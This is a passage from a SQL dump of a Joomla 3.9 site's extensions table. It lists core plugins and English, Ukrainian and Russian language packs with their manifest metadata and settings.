reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_UPDATENOTIFICATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"updatenotification\"}','{\"lastrun\":1676585046}','','',0,'0000-00-00 00:00:00',0,0),(453,0,'plg_editors-xtd_module','plugin','module','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_module\",\"type\":\"plugin\",\"creationDate\":\"October 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_MODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"module\"}','','','',0,'0000-00-00 00:00:00',0,0),(454,0,'plg_system_stats','plugin','stats','system',0,1,1,0,'{\"name\":\"plg_system_stats\",\"type\":\"plugin\",\"creationDate\":\"November 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"stats\"}','{\"mode\":1,\"lastrun\":1674380345,\"unique_id\":\"f10d203c36bf7c80417daa6539796c6bc6a1693d\",\"interval\":12}','','',0,'0000-00-00 00:00:00',0,0),(455,0,'plg_installer_packageinstaller','plugin','packageinstaller','installer',0,1,1,1,'{\"name\":\"plg_installer_packageinstaller\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_PACKAGEINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"packageinstaller\"}','','','',0,'0000-00-00 00:00:00',1,0),(456,0,'PLG_INSTALLER_FOLDERINSTALLER','plugin','folderinstaller','installer',0,1,1,1,'{\"name\":\"PLG_INSTALLER_FOLDERINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_FOLDERINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"folderinstaller\"}','','','',0,'0000-00-00 00:00:00',2,0),(457,0,'PLG_INSTALLER_URLINSTALLER','plugin','urlinstaller','installer',0,1,1,1,'{\"name\":\"PLG_INSTALLER_URLINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_URLINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"urlinstaller\"}','','','',0,'0000-00-00 00:00:00',3,0),(458,0,'plg_quickicon_phpversioncheck','plugin','phpversioncheck','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_phpversioncheck\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_QUICKICON_PHPVERSIONCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpversioncheck\"}','','','',0,'0000-00-00 00:00:00',0,0),(459,0,'plg_editors-xtd_menu','plugin','menu','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_menu\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(460,0,'plg_editors-xtd_contact','plugin','contact','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_contact\",\"type\":\"plugin\",\"creationDate\":\"October 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','','','',0,'0000-00-00 00:00:00',0,0),(461,0,'plg_system_fields','plugin','fields','system',0,1,1,0,'{\"name\":\"plg_system_fields\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_SYSTEM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(462,0,'plg_fields_calendar','plugin','calendar','fields',0,1,1,0,'{\"name\":\"plg_fields_calendar\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CALENDAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"calendar\"}','','','',0,'0000-00-00 00:00:00',0,0),(463,0,'plg_fields_checkboxes','plugin','checkboxes','fields',0,1,1,0,'{\"name\":\"plg_fields_checkboxes\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CHECKBOXES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"checkboxes\"}','','','',0,'0000-00-00 00:00:00',0,0),(464,0,'plg_fields_color','plugin','color','fields',0,1,1,0,'{\"name\":\"plg_fields_color\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_COLOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"color\"}','','','',0,'0000-00-00 00:00:00',0,0),(465,0,'plg_fields_editor','plugin','editor','fields',0,1,1,0,'{\"name\":\"plg_fields_editor\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_EDITOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"editor\"}','','','',0,'0000-00-00 00:00:00',0,0),(466,0,'plg_fields_imagelist','plugin','imagelist','fields',0,1,1,0,'{\"name\":\"plg_fields_imagelist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_IMAGELIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"imagelist\"}','','','',0,'0000-00-00 00:00:00',0,0),(467,0,'plg_fields_integer','plugin','integer','fields',0,1,1,0,'{\"name\":\"plg_fields_integer\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_INTEGER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"integer\"}','{\"multiple\":\"0\",\"first\":\"1\",\"last\":\"100\",\"step\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(468,0,'plg_fields_list','plugin','list','fields',0,1,1,0,'{\"name\":\"plg_fields_list\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_LIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"list\"}','','','',0,'0000-00-00 00:00:00',0,0),(469,0,'plg_fields_media','plugin','media','fields',0,1,1,0,'{\"name\":\"plg_fields_media\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','','','',0,'0000-00-00 00:00:00',0,0),(470,0,'plg_fields_radio','plugin','radio','fields',0,1,1,0,'{\"name\":\"plg_fields_radio\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_RADIO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"radio\"}','','','',0,'0000-00-00 00:00:00',0,0),(471,0,'plg_fields_sql','plugin','sql','fields',0,1,1,0,'{\"name\":\"plg_fields_sql\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_SQL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sql\"}','','','',0,'0000-00-00 00:00:00',0,0),(472,0,'plg_fields_text','plugin','text','fields',0,1,1,0,'{\"name\":\"plg_fields_text\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"text\"}','','','',0,'0000-00-00 00:00:00',0,0),(473,0,'plg_fields_textarea','plugin','textarea','fields',0,1,1,0,'{\"name\":\"plg_fields_textarea\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXTAREA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"textarea\"}','','','',0,'0000-00-00 00:00:00',0,0),(474,0,'plg_fields_url','plugin','url','fields',0,1,1,0,'{\"name\":\"plg_fields_url\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_URL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"url\"}','','','',0,'0000-00-00 00:00:00',0,0),(475,0,'plg_fields_user','plugin','user','fields',0,1,1,0,'{\"name\":\"plg_fields_user\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','','','',0,'0000-00-00 00:00:00',0,0),(476,0,'plg_fields_usergrouplist','plugin','usergrouplist','fields',0,1,1,0,'{\"name\":\"plg_fields_usergrouplist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USERGROUPLIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"usergrouplist\"}','','','',0,'0000-00-00 00:00:00',0,0),(477,0,'plg_content_fields','plugin','fields','content',0,1,1,0,'{\"name\":\"plg_content_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_CONTENT_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(478,0,'plg_editors-xtd_fields','plugin','fields','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(479,0,'plg_sampledata_blog','plugin','blog','sampledata',0,0,1,0,'{\"name\":\"plg_sampledata_blog\",\"type\":\"plugin\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"PLG_SAMPLEDATA_BLOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"blog\"}','','','',0,'0000-00-00 00:00:00',0,0),(480,0,'plg_system_sessiongc','plugin','sessiongc','system',0,1,1,0,'{\"name\":\"plg_system_sessiongc\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.6\",\"description\":\"PLG_SYSTEM_SESSIONGC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sessiongc\"}','','','',0,'0000-00-00 00:00:00',0,0),(481,0,'plg_fields_repeatable','plugin','repeatable','fields',0,1,1,0,'{\"name\":\"plg_fields_repeatable\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_FIELDS_REPEATABLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"repeatable\"}','','','',0,'0000-00-00 00:00:00',0,0),(482,0,'plg_content_confirmconsent','plugin','confirmconsent','content',0,0,1,0,'{\"name\":\"plg_content_confirmconsent\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_CONTENT_CONFIRMCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"confirmconsent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(483,0,'PLG_SYSTEM_ACTIONLOGS','plugin','actionlogs','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_ACTIONLOGS\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(484,0,'PLG_ACTIONLOG_JOOMLA','plugin','joomla','actionlog',0,1,1,0,'{\"name\":\"PLG_ACTIONLOG_JOOMLA\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_ACTIONLOG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(485,0,'plg_system_privacyconsent','plugin','privacyconsent','system',0,0,1,0,'{\"name\":\"plg_system_privacyconsent\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_PRIVACYCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacyconsent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(486,0,'plg_system_logrotation','plugin','logrotation','system',0,1,1,0,'{\"name\":\"plg_system_logrotation\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_LOGROTATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logrotation\"}','{\"lastrun\":1676070187}','','',0,'0000-00-00 00:00:00',0,0),(487,0,'plg_privacy_user','plugin','user','privacy',0,1,1,0,'{\"name\":\"plg_privacy_user\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(488,0,'plg_quickicon_privacycheck','plugin','privacycheck','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_privacycheck\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_QUICKICON_PRIVACYCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacycheck\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(489,0,'plg_user_terms','plugin','terms','user',0,0,1,0,'{\"name\":\"plg_user_terms\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_USER_TERMS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"terms\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(490,0,'plg_privacy_contact','plugin','contact','privacy',0,1,1,0,'{\"name\":\"plg_privacy_contact\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(491,0,'plg_privacy_content','plugin','content','privacy',0,1,1,0,'{\"name\":\"plg_privacy_content\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(492,0,'plg_privacy_message','plugin','message','privacy',0,1,1,0,'{\"name\":\"plg_privacy_message\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_MESSAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"message\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(493,0,'plg_privacy_actionlogs','plugin','actionlogs','privacy',0,1,1,0,'{\"name\":\"plg_privacy_actionlogs\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(494,0,'plg_captcha_recaptcha_invisible','plugin','recaptcha_invisible','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha_invisible\",\"type\":\"plugin\",\"creationDate\":\"November 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_INVISIBLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha_invisible\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(495,0,'plg_privacy_consents','plugin','consents','privacy',0,1,1,0,'{\"name\":\"plg_privacy_consents\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONSENTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"consents\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(600,802,'English (en-GB)','language','en-GB','',0,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,802,'English (en-GB)','language','en-GB','',1,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,0,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(801,0,'pkg_weblinks','package','pkg_weblinks','',0,1,1,0,'{\"name\":\"pkg_weblinks\",\"type\":\"package\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PKG_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pkg_weblinks\"}','','','',0,'0000-00-00 00:00:00',0,0),(802,0,'English (en-GB) Language Pack','package','pkg_en-GB','',0,1,1,1,'{\"name\":\"English (en-GB) Language Pack\",\"type\":\"package\",\"creationDate\":\"June 2019\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.8.1\",\"description\":\"en-GB language pack\",\"group\":\"\",\"filename\":\"pkg_en-GB\"}','','','',0,'0000-00-00 00:00:00',0,0),(10000,10271,'Ukrainianuk-UA','language','uk-UA','',0,1,0,0,'{\"name\":\"Ukrainian (uk-UA)\",\"type\":\"language\",\"creationDate\":\"03\\/06\\/2020\",\"author\":\"Denys Nosov\",\"copyright\":\"2006-2020 (C) Joomla! Ukraine (https:\\/\\/joomla-ua.org). All rights reserved.\",\"authorEmail\":\"denys@joomla-ua.org\",\"authorUrl\":\"https:\\/\\/joomla-ua.org\",\"version\":\"3.9.19.1\",\"description\":\"uk-UA - Site language\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10001,10271,'Ukrainianuk-UA','language','uk-UA','',1,1,0,0,'{\"name\":\"Ukrainian (uk-UA)\",\"type\":\"language\",\"creationDate\":\"03\\/06\\/2020\",\"author\":\"Denys Nosov\",\"copyright\":\"2006-2020 (C) Joomla! Ukraine (https:\\/\\/joomla-ua.org). All rights reserved.\",\"authorEmail\":\"denys@joomla-ua.org\",\"authorUrl\":\"https:\\/\\/joomla-ua.org\",\"version\":\"3.9.19.1\",\"description\":\"uk-UA - Administration language\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10026,10029,'Russian','language','ru-RU','',0,1,0,0,'{\"name\":\"Russian\",\"type\":\"language\",\"creationDate\":\"2019-05-20\",\"author\":\"Russian Translation Team\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"smart@joomlaportal.ru\",\"authorUrl\":\"www.joomlaportal.ru\",\"version\":\"3.9.6.2\",\"description\":\"Russian language pack (site) for Joomla! 3.9.6\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10027,10029,'ru-RU','language','ru-RU','',1,1,0,0,'{\"name\":\"\\u0420\\u0443\\u0441\\u0441\\u043a\\u0438\\u0439 (ru-RU)\",\"type\":\"language\",\"creationDate\":\"2019-05-20\",\"author\":\"Russian Translation Team\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"smart@joomlaportal.ru\",\"authorUrl\":\"www.joomlaportal.ru\",\"version\":\"3.9.6.2\",\"description\":\"Russian language pack (administrator) for Joomla! 